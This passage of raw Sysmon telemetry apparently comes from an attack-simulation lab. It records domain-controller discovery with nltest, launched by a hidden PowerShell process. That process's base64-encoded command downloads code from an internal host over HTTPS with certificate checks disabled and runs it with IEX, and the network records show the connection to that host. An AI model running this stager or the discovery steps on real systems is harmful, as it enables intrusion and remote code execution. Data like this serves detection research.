Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CAEA376083F12BC0647516C76FBAF13,SHA256=1F570078C8B8CD745120029CC9278DB2595C5EB0B832E948C4FC8431534DCCB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:31.159{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56710-false10.0.1.12-8000- 734700x800000000000000035085248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.418{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\System32\nltest.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 10341000x800000000000000035085247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.418{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.418{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.281{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.266{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\system32\nltest.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035085238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:07.272{B81B27B7-4F2B-613A-5C90-03000000C801}6048C:\Windows\System32\nltest.exe10.0.14393.4283 (rs1_release.210303-1802)Microsoft® Logon Server Test UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationnltestrk.exe"C:\Windows\system32\nltest.exe" /dclist:C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=1171BC1F016201B83E30634121BA2A40,SHA256=8DB95007AC3DD96C487C0CC477BD89A6282D6F0949EBCECBBDA4F8D37C2A959C,IMPHASH=4C049D80BB0FE7E8B0688666FFF88442{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000035085256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.674{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72B271D3AD4580DC8DE917B7E77C0EC2,SHA256=460000AD6CDE309D5926F80A2AD9999B3E0B63A9811FD8A59BAFE6A15DCDEDA3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.320{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-987.attackrange.local51097-false10.0.1.14WIN-DC-128389- 354300x800000000000000035085254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.274{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56711-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035085253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9295017DD30BC06A1C3664A35146EF97,SHA256=D6355494B9112B5B80895CF65A0CACF8B324E881FA5B276E439B2F42C77CE76E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.374{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67737AB8F8A56DD63A754C3B4AF7241C,SHA256=3DA28988D74FBF438FA7B63A1F75DE266D2DE3B3598899FDCA935E9359991C38,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:08.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=297388D1E924568213DD35605EEB84D7,SHA256=939595F8E1A067A652DBF6EDBE2C8F540F7E04ABA70CDCBE2D9BCE64461322E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:09.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CD5EDFBA1477740B426355EF6F8E4D0,SHA256=EB53A3CC238F11CED27CD4A90A597318CD00E9591CA726EE2D8C811B81492C69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.444{00000000-0000-0000-0000-000000000000}6048<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56712-false10.0.1.14WIN-DC-128135epmap 22542200x800000000000000035085257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.443{00000000-0000-0000-0000-000000000000}6048win-dc-128.attackrange.local0::ffff:10.0.1.14;<unknown process> 23542300x800000000000000035085272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:10.735{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A794BF97145CCE1EBA575CF38E170BB,SHA256=2BEE722242E53E066FF42C1FB8CE74031EF99051DA8357F59747010556F2858C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.669{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56714-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035085270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:33.448{00000000-0000-0000-0000-000000000000}6048<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56713-false10.0.1.14WIN-DC-12849666- 13241300x800000000000000035085269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000035085268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x71837ade) 13241300x800000000000000035085267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59e-0x3e111205) 13241300x800000000000000035085266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a6-0x9fd57a05) 13241300x800000000000000035085265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5af-0x0199e205) 13241300x800000000000000035085264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035085263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x71837ade) 13241300x800000000000000035085262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59e-0x3ef63278) 13241300x800000000000000035085261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a6-0xa0ba9a78) 13241300x800000000000000035085260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:15:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5af-0x027f0278) 23542300x800000000000000035085273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:11.771{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93E52389F82F2FACB0A7123FBE65A667,SHA256=89613798130DFF74A0F26DA3E484EE28397C2561C3136A9A50CCCD45ADEB1910,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085276Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:12.787{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42C7B2B0B1F7301352FA0D021270FB47,SHA256=5897744012C8240254563B75E0F1F8A93ABD03FC285A069CABE0833937417DB6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085275Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:12.703{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=48E7B33865A591E66D047B3C2DB2F9E1,SHA256=4183F76844A098CBA6673A71669FAD121191C901AAD581DD79C02D94D9D8BD0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035085274Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:36.227{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56715-false10.0.1.12-8000- 10341000x800000000000000035085295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.852{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4F31-613A-5E90-03000000C801}5332C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:15:13.835{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 